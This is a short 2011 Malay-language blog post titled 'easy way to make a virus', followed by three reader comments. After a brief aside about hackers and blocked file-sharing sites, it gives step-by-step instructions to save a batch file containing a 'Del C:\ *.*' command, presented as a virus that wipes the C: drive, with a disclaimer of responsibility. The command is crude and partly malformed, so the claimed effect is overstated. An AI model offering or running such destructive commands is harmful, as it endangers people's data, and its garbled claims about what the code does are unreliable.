Friday, June 17, 2011

CARA MUDAH MEMBUAT VIRUS

kecoh seketika pasal serangan siber yang bertalu-talu, xde pasal cari pasal, mana hak kebebasan kita
dalam dunia ciber, tindakan kerajaan menyekat laman perkongsian file menyebabkan geng-geng hackers naik
angin, antara sebab-sebab yang diketahui ialah, mengganggu operasi-operasi diaorang dalam aktiviti
internet nie.
contohnya menyebabkan aktiviti mendownload movie, sofware, music dan sebagainya dengan tujuan mencetak balik
untuk dijual kepada orang ramai dan juga untuk kegunaan diri sendiri, inilah yang menyebabkan tokei-tokei
panas.
sekarang ni, bukan hanya orang dewasa yang pandai mengodam, budak bawah umur pun dah reti,
sebabsering terdedah dengan game-game online, explore cheat code menyebabkan diaorg semakin maju dalam perkara-
perkara ni, seterusnya......tanpa menulis panjang lebar, aku hanya nak bercerita tentang>>>>
.
.
.
 "notepad", korang mesti selalu pakaikan untuk menulis entri2 simple tanpa menggunakan word,
dan kali ni aku nak bercerita sedikit tentang notepad nih, walau nampak simple dan mudah digunakan,
ia sebenarnya berbahaya.

NOTEPAD



boleh buat antivus kalau mahu: nak tahu cara-caranya?
"hari ni kita belajar buat virus yang mudah-mudah jer

begini:

1.buka notepade:

korang taip kod nie:

@Echo off
Del C:\ *.* |y 

selesai menulis kod diatas, savekan dan buat format sebagai .bat 
bukan .txt yer...dan selesai langkah tersebut, korang cuba run.


effectnya:
1.mengakibatkan folder c:drive korang didelete.




*pesanan*

<<>>
penulis tidak bertanggungjawab diatas risiko yang berlaku 


3 comments:

Joe_eL said...

klu buat je pastu simpan dalam pendrive, effect laptop kita x?

zwan said...

buat je takpe, lepas buat, jgn cuba2 klik. nt rosak laptop tu..hehee

Jasman said...

bahaya tu...

Related Posts Plugin for WordPress, Blogger...